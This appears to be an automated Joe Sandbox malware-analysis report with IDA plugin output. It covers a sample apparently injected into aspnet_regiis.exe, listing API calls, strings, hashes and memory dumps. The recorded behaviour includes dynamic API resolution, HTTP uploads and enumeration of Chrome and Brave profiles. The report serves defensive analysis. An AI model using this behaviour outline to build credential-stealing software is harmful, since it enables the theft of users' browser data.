Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: b96ce037c1416df6678a10cd4d244d9e0a09a9cbf854bfc3f3d93434b3a8b456
Instruction ID: d09f7d4a4cdee2cb9c7ae6adf7f1acc570eca9ecec5d1397b35767d6cd46bdcd
Opcode Fuzzy Hash: b96ce037c1416df6678a10cd4d244d9e0a09a9cbf854bfc3f3d93434b3a8b456
Instruction Fuzzy Hash: BBF03036604524BBCF221F96EC08DC93F77FB093B1B484150FA1DC6520D7328821EB94

Function 6CC2C64F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 6CC2C674

Strings

MOC, xrefs: 6CC2C686
RCC, xrefs: 6CC2C68E

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: e1dfed186f2d4f4437d1a50ced360956d99358afa12a3012445cabee545dadbf
Instruction ID: f205e8b09705d05f33ac52ea5d545f11d755327b92f6bf4c96e3df334426beb9
Opcode Fuzzy Hash: e1dfed186f2d4f4437d1a50ced360956d99358afa12a3012445cabee545dadbf
Instruction Fuzzy Hash: B5416A71900209AFEF01DF94CD80ADE7BB5FF08708F248159FA15A7620E339D951DB51

Function 6CC50D50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CC50D9F
__aulldiv.LIBCMT ref: 6CC50DAD

Strings

@, xrefs: 6CC50D7A

Memory Dump Source

Source File: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, Offset: 6CC3D000, based on PE: true

Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: @
API String ID: 3732870572-2766056989
Opcode ID: a20d0a6a5635da1d062ac6d6d21c57d3294084c3a9f838a70f234ac636bd73c4
Instruction ID: 73739bef326d36b3bbd7decb06f7c2c065ccf72207692a45d85fda2fde5b5467
Opcode Fuzzy Hash: a20d0a6a5635da1d062ac6d6d21c57d3294084c3a9f838a70f234ac636bd73c4
Instruction Fuzzy Hash: 48111BB0D40708BBEB10DBE4CC49FAEB7B9BB44708F504548F605FB684D7B4A9158BA8

Function 6CC3D5E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CC3D618
__aulldiv.LIBCMT ref: 6CC3D626

Strings

@, xrefs: 6CC3D5F3

Memory Dump Source

Source File: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, Offset: 6CC3D000, based on PE: true

Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: @
API String ID: 3732870572-2766056989
Opcode ID: 4ba05935f44ab2b4d789e44d08bf17577f3e6861a985c5d0a50b09be66756692
Instruction ID: afc766ac78d1b51b1c364920d10ab5d69666474dce2d4979058dd5c89802ad3e
Opcode Fuzzy Hash: 4ba05935f44ab2b4d789e44d08bf17577f3e6861a985c5d0a50b09be66756692
Instruction Fuzzy Hash: 1901ADB0A60308FBEB10CFD0DC49B8DBBB9BB44709F208408E708B66C0E77496558B59

Analysis Process: aspnet_regiis.exePID: 7596, Parent PID: 7520COMMON

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	41

Executed Functions

Function 02766230 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,02BAD4C8), ref: 0276624D
GetProcAddress.KERNEL32(74DD0000,02BAD868), ref: 02766265
GetProcAddress.KERNEL32(74DD0000,02BAADC0), ref: 0276627E
GetProcAddress.KERNEL32(74DD0000,02BAAF88), ref: 02766296
GetProcAddress.KERNEL32(74DD0000,02BAAE68), ref: 027662AE
GetProcAddress.KERNEL32(74DD0000,02BAAFD0), ref: 027662C7
GetProcAddress.KERNEL32(74DD0000,02BB05E8), ref: 027662DF
GetProcAddress.KERNEL32(74DD0000,02BAB000), ref: 027662F7
GetProcAddress.KERNEL32(74DD0000,02BAAEB0), ref: 02766310
GetProcAddress.KERNEL32(74DD0000,02BAAD90), ref: 02766328
GetProcAddress.KERNEL32(74DD0000,02BAADD8), ref: 02766340
GetProcAddress.KERNEL32(74DD0000,02BAD7C8), ref: 02766359
GetProcAddress.KERNEL32(74DD0000,02BAD608), ref: 02766371
GetProcAddress.KERNEL32(74DD0000,02BAD808), ref: 02766389
GetProcAddress.KERNEL32(74DD0000,02BAD768), ref: 027663A2
GetProcAddress.KERNEL32(74DD0000,02BAAEC8), ref: 027663BA
GetProcAddress.KERNEL32(74DD0000,02BAAFE8), ref: 027663D2
GetProcAddress.KERNEL32(74DD0000,02BB0778), ref: 027663EB
GetProcAddress.KERNEL32(74DD0000,02BAD628), ref: 02766403
GetProcAddress.KERNEL32(74DD0000,02BAAE08), ref: 0276641B
GetProcAddress.KERNEL32(74DD0000,02BAB048), ref: 02766434
GetProcAddress.KERNEL32(74DD0000,02BAB120), ref: 0276644C
GetProcAddress.KERNEL32(74DD0000,02BAB090), ref: 02766464
GetProcAddress.KERNEL32(74DD0000,02BAD528), ref: 0276647D
GetProcAddress.KERNEL32(74DD0000,02BAB0A8), ref: 02766495
GetProcAddress.KERNEL32(74DD0000,02BAB0C0), ref: 027664AD
GetProcAddress.KERNEL32(74DD0000,02BAB078), ref: 027664C6
GetProcAddress.KERNEL32(74DD0000,02BAB0F0), ref: 027664DE
GetProcAddress.KERNEL32(74DD0000,02BAB108), ref: 027664F6
GetProcAddress.KERNEL32(74DD0000,02BAB138), ref: 0276650F
GetProcAddress.KERNEL32(74DD0000,02BAB0D8), ref: 02766527
GetProcAddress.KERNEL32(74DD0000,02BB4C80), ref: 0276653F
GetProcAddress.KERNEL32(74DD0000,02BB4DD0), ref: 02766558
GetProcAddress.KERNEL32(74DD0000,02BA99D0), ref: 02766570
GetProcAddress.KERNEL32(74DD0000,02BB4E60), ref: 02766588
GetProcAddress.KERNEL32(74DD0000,02BB4D88), ref: 027665A1
GetProcAddress.KERNEL32(74DD0000,02BAD648), ref: 027665B9
GetProcAddress.KERNEL32(74DD0000,02BB4E30), ref: 027665D1
GetProcAddress.KERNEL32(74DD0000,02BAD4E8), ref: 027665EA
GetProcAddress.KERNEL32(74DD0000,02BB4C68), ref: 02766602
GetProcAddress.KERNEL32(74DD0000,02BB4C98), ref: 0276661A
GetProcAddress.KERNEL32(74DD0000,02BAD668), ref: 02766633
GetProcAddress.KERNEL32(74DD0000,02BAD848), ref: 0276664B
LoadLibraryA.KERNEL32(02BB4CF8,?,02762CC6,?,00000030,00000064,027632C0,?,0000002C,00000064,02763260,?,00000030,00000064,Function_00013160,?), ref: 0276665D
LoadLibraryA.KERNEL32(02BB4DE8,?,02762CC6,?,00000030,00000064,027632C0,?,0000002C,00000064,02763260,?,00000030,00000064,Function_00013160,?), ref: 0276666E
LoadLibraryA.KERNEL32(02BB4BA8,?,02762CC6,?,00000030,00000064,027632C0,?,0000002C,00000064,02763260,?,00000030,00000064,Function_00013160,?), ref: 02766680
LoadLibraryA.KERNEL32(02BB4C38,?,02762CC6,?,00000030,00000064,027632C0,?,0000002C,00000064,02763260,?,00000030,00000064,Function_00013160,?), ref: 02766692
LoadLibraryA.KERNEL32(02BB4DA0,?,02762CC6,?,00000030,00000064,027632C0,?,0000002C,00000064,02763260,?,00000030,00000064,Function_00013160,?), ref: 027666A3
LoadLibraryA.KERNEL32(02BB4CE0,?,02762CC6,?,00000030,00000064,027632C0,?,0000002C,00000064,02763260,?,00000030,00000064,Function_00013160,?), ref: 027666B5
LoadLibraryA.KERNEL32(02BB4E18,?,02762CC6,?,00000030,00000064,027632C0,?,0000002C,00000064,02763260,?,00000030,00000064,Function_00013160,?), ref: 027666C7
LoadLibraryA.KERNEL32(02BB4C20,?,02762CC6,?,00000030,00000064,027632C0,?,0000002C,00000064,02763260,?,00000030,00000064,Function_00013160,?), ref: 027666D8
GetProcAddress.KERNEL32(75290000,02BAD548), ref: 027666FA
GetProcAddress.KERNEL32(75290000,02BB4CB0), ref: 02766712
GetProcAddress.KERNEL32(75290000,02BAE1B8), ref: 0276672A
GetProcAddress.KERNEL32(75290000,02BB4CC8), ref: 02766743
GetProcAddress.KERNEL32(75290000,02BAD5A8), ref: 0276675B
GetProcAddress.KERNEL32(6FDA0000,02BB0610), ref: 02766780
GetProcAddress.KERNEL32(6FDA0000,02BAD788), ref: 02766799
GetProcAddress.KERNEL32(6FDA0000,02BB0700), ref: 027667B1
GetProcAddress.KERNEL32(6FDA0000,02BB4D10), ref: 027667C9
GetProcAddress.KERNEL32(6FDA0000,02BB4C08), ref: 027667E2
GetProcAddress.KERNEL32(6FDA0000,02BAD5C8), ref: 027667FA
GetProcAddress.KERNEL32(6FDA0000,02BAD6E8), ref: 02766812
GetProcAddress.KERNEL32(6FDA0000,02BB4C50), ref: 0276682B
GetProcAddress.KERNEL32(752C0000,02BAD7E8), ref: 0276684C
GetProcAddress.KERNEL32(752C0000,02BAD888), ref: 02766864
GetProcAddress.KERNEL32(752C0000,02BB4E48), ref: 0276687D
GetProcAddress.KERNEL32(752C0000,02BB4E00), ref: 02766895
GetProcAddress.KERNEL32(752C0000,02BAD508), ref: 027668AD
GetProcAddress.KERNEL32(74EC0000,02BB0638), ref: 027668D3
GetProcAddress.KERNEL32(74EC0000,02BB0408), ref: 027668EB
GetProcAddress.KERNEL32(74EC0000,02BB4E78), ref: 02766903
GetProcAddress.KERNEL32(74EC0000,02BB5130), ref: 0276691C
GetProcAddress.KERNEL32(74EC0000,02BB5110), ref: 02766934
GetProcAddress.KERNEL32(74EC0000,02BB0660), ref: 0276694C
GetProcAddress.KERNEL32(75BD0000,02BB4DB8), ref: 02766972
GetProcAddress.KERNEL32(75BD0000,02BB5230), ref: 0276698A
GetProcAddress.KERNEL32(75BD0000,02BB5A98), ref: 027669A2
GetProcAddress.KERNEL32(75BD0000,02BB4D40), ref: 027669BB
GetProcAddress.KERNEL32(75BD0000,02BB4E90), ref: 027669D3
GetProcAddress.KERNEL32(75BD0000,02BB5250), ref: 027669EB
GetProcAddress.KERNEL32(75BD0000,02BB5210), ref: 02766A04
GetProcAddress.KERNEL32(75BD0000,02BB4BC0), ref: 02766A1C
GetProcAddress.KERNEL32(75BD0000,02BB4BD8), ref: 02766A34
GetProcAddress.KERNEL32(75A70000,02BB5190), ref: 02766A56
GetProcAddress.KERNEL32(75A70000,02BB4D70), ref: 02766A6E
GetProcAddress.KERNEL32(75A70000,02BB4BF0), ref: 02766A86
GetProcAddress.KERNEL32(75A70000,02BB4D28), ref: 02766A9F
GetProcAddress.KERNEL32(75A70000,02BB4D58), ref: 02766AB7
GetProcAddress.KERNEL32(75450000,02BB51B0), ref: 02766AD8
GetProcAddress.KERNEL32(75450000,02BB5270), ref: 02766AF1
GetProcAddress.KERNEL32(75DA0000,02BB5330), ref: 02766B12
GetProcAddress.KERNEL32(75DA0000,02BB4F08), ref: 02766B2A
GetProcAddress.KERNEL32(6F090000,02BB5390), ref: 02766B50
GetProcAddress.KERNEL32(6F090000,02BB4FB0), ref: 02766B68
GetProcAddress.KERNEL32(6F090000,02BB5290), ref: 02766B80
GetProcAddress.KERNEL32(6F090000,02BB4F20), ref: 02766B99
GetProcAddress.KERNEL32(6F090000,02BB5350), ref: 02766BB1
GetProcAddress.KERNEL32(6F090000,02BB4FD0), ref: 02766BC9
GetProcAddress.KERNEL32(6F090000,02BB5090), ref: 02766BE2
GetProcAddress.KERNEL32(6F090000,02BB5150), ref: 02766BFA
GetProcAddress.KERNEL32(75AF0000,02BB4ED8), ref: 02766C1B
GetProcAddress.KERNEL32(75AF0000,02BB59E8), ref: 02766C34
GetProcAddress.KERNEL32(75AF0000,02BB4EF0), ref: 02766C4C
GetProcAddress.KERNEL32(75AF0000,02BB4F38), ref: 02766C64
GetProcAddress.KERNEL32(75D90000,02BB5170), ref: 02766C86
GetProcAddress.KERNEL32(6CBF0000,02BB4F50), ref: 02766CA7
GetProcAddress.KERNEL32(6CBF0000,02BB52B0), ref: 02766CBF
GetProcAddress.KERNEL32(6CBF0000,02BB4F68), ref: 02766CD8
GetProcAddress.KERNEL32(6CBF0000,02BB4EC0), ref: 02766CF0

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 8d62e9dca20f601a9697964227311a4ed427a38e46233fb6e40e0d598a101d43
Instruction ID: ebbb9cef32738cad2d089c3fa2050c7e9e3f2a73f6cdb0ef7462fda14fd1d0fa
Opcode Fuzzy Hash: 8d62e9dca20f601a9697964227311a4ed427a38e46233fb6e40e0d598a101d43
Instruction Fuzzy Hash: C46264B5ECC200EFC744DFA8F989A3637B9BB8D2113526D29E609C3246D7749468CF60

Function 02755610 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02766D90: lstrcpy.KERNEL32(?,00000000), ref: 02766DD6

Part of subcall function 02754470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 027544F6
Part of subcall function 02754470: InternetCrackUrlA.WININET(00000000,00000000), ref: 02754506

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 027556A8
StrCmpCA.SHLWAPI(?,02BB5868), ref: 027556C3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02755843
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,02BB58A8,00000000,?,02BA9880,00000000,?,0276E0D8), ref: 02755B1E
lstrlen.KERNEL32(00000000), ref: 02755B2F
GetProcessHeap.KERNEL32(00000000,?), ref: 02755B40
RtlAllocateHeap.NTDLL(00000000), ref: 02755B47
lstrlen.KERNEL32(00000000), ref: 02755B5C
memcpy.MSVCRT ref: 02755B73
lstrlen.KERNEL32(00000000), ref: 02755B85
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02755B9E
memcpy.MSVCRT ref: 02755BAB
lstrlen.KERNEL32(00000000,?,?), ref: 02755BC8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02755BDC
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 02755BF9
InternetCloseHandle.WININET(00000000), ref: 02755C5D
InternetCloseHandle.WININET(00000000), ref: 02755C6A
HttpOpenRequestA.WININET(00000000,02BB5818,?,02BB6370,00000000,00000000,00400100,00000000), ref: 027558A8

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

InternetCloseHandle.WININET(00000000), ref: 02755C74

Strings

", xrefs: 02755AC6
------, xrefs: 027558BB
------, xrefs: 02755746
", xrefs: 02755985
------, xrefs: 027559FC

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 36004537-2180234286
Opcode ID: 7686fd89609538352bcee8eb052427babdf2ff6c74f9b645574f26be7779ac2d
Instruction ID: 293ece2eb3efcbc10b551e5ebcf1a1daf322e6dcb11c084673c82c865f06c4f4
Opcode Fuzzy Hash: 7686fd89609538352bcee8eb052427babdf2ff6c74f9b645574f26be7779ac2d
Instruction Fuzzy Hash: F212D171964118ABDB16EBA1DC5CFFEB37DBF14700F8045A9A90663090EF746A48CFA4

Function 0275B610 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

FindFirstFileA.KERNEL32(00000000,?,0276D71A,0276D717,00000000,?,?,?,0276DB54,0276D716), ref: 0275B695
StrCmpCA.SHLWAPI(?,0276DB58), ref: 0275B6ED
StrCmpCA.SHLWAPI(?,0276DB5C), ref: 0275B703
FindNextFileA.KERNELBASE(000000FF,?), ref: 0275BF3B
FindClose.KERNEL32(000000FF), ref: 0275BF4D

Strings

Google Chrome, xrefs: 0275BDB9
\Brave\Preferences, xrefs: 0275B97B
Preferences, xrefs: 0275B8BE
Brave, xrefs: 0275B8A2

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: dc5b18ec65efadf6d0ff6dc45c23aaa64e1c1206f27a248fb6b143ac143490ce
Instruction ID: 7109f06be450c39fa8660cdd9ba35bb30efb4afa4d29d1a4ceface1288cf1ec0
Opcode Fuzzy Hash: dc5b18ec65efadf6d0ff6dc45c23aaa64e1c1206f27a248fb6b143ac143490ce
Instruction Fuzzy Hash: 344200729101189BCF15FBA1DD9DEFE733EAB84344F844668AD0A57044EF74AA48CFA1

Function 6C2A35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C32F688,00001000), ref: 6C2A35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C2A35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C2A35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C2A363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C2A369F
__aulldiv.LIBCMT ref: 6C2A36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C2A3773
EnterCriticalSection.KERNEL32(6C32F688), ref: 6C2A377E
LeaveCriticalSection.KERNEL32(6C32F688), ref: 6C2A37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C2A37C4
EnterCriticalSection.KERNEL32(6C32F688), ref: 6C2A37CB
LeaveCriticalSection.KERNEL32(6C32F688), ref: 6C2A3801
__aulldiv.LIBCMT ref: 6C2A3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C2A3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C2A3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C2A394C

Strings

AuthcAMDenti, xrefs: 6C2A3946
GenuntelineI, xrefs: 6C2A3639
QPC, xrefs: 6C2A38FC
MOZ_TIMESTAMP_MODE, xrefs: 6C2A35DB
GTC, xrefs: 6C2A3912

Memory Dump Source

Source File: 00000002.00000002.1824225528.000000006C2A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000002.00000002.1824205065.000000006C2A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1824379859.000000006C32E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1824411954.000000006C332000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c2a0000_aspnet_regiis.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 22fb02e3b3a1ddb9be0ea405e86eba0ee32e2ad1b848c31aa7bfdf0497680b06
Instruction ID: 08ab5a7718133e019c10db02ee4138bbbe08e971c32879a6b2e76df9ef049b01
Opcode Fuzzy Hash: 22fb02e3b3a1ddb9be0ea405e86eba0ee32e2ad1b848c31aa7bfdf0497680b06
Instruction Fuzzy Hash: 24B1AE71B083119BDF08DF28D845A5ABBF9FB8E705F05892EE89AD7750D738D8058B81

Function 02762570 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 02762589
FindFirstFileA.KERNEL32(?,?), ref: 027625A0
StrCmpCA.SHLWAPI(?,0276D864), ref: 027625CE
StrCmpCA.SHLWAPI(?,0276D868), ref: 027625E4
FindNextFileA.KERNEL32(000000FF,?), ref: 027627B9
FindClose.KERNEL32(000000FF), ref: 027627CE

Strings

%s\%s, xrefs: 0276264F
%s\%s, xrefs: 027625FE
%s\*, xrefs: 0276257D

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 90cf3ee7b87e345db23df0cae46e09bc006df758a204edb48a42a0befb496909
Instruction ID: 206b71a1222915f3227ae74cfd38b3b23dde93e47d17a6e187452ba23b8f4f14
Opcode Fuzzy Hash: 90cf3ee7b87e345db23df0cae46e09bc006df758a204edb48a42a0befb496909
Instruction Fuzzy Hash: C66148B1944218ABDB64EBE0DC5DEFA777DBF48701F444588BE0A96041EB709B58CF90

Function 02765700 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

image/jpeg, xrefs: 02765826

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID:
String ID: image/jpeg
API String ID: 0-3785015651
Opcode ID: d5038706cea4d44270006fe10e65d77d722054b31a6881b0d8cd5e06e3d66461
Instruction ID: 0ff8f01bbf5cc997ed8eaff03628ebb4ecb7facd0554f22a7cb9f0b62ee2cebd
Opcode Fuzzy Hash: d5038706cea4d44270006fe10e65d77d722054b31a6881b0d8cd5e06e3d66461
Instruction Fuzzy Hash: 0E71D875E54208ABDB14EFE4D898FEEB7B9BF48710F508508F915A7280DB74A918CB60

Function 02761B80 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

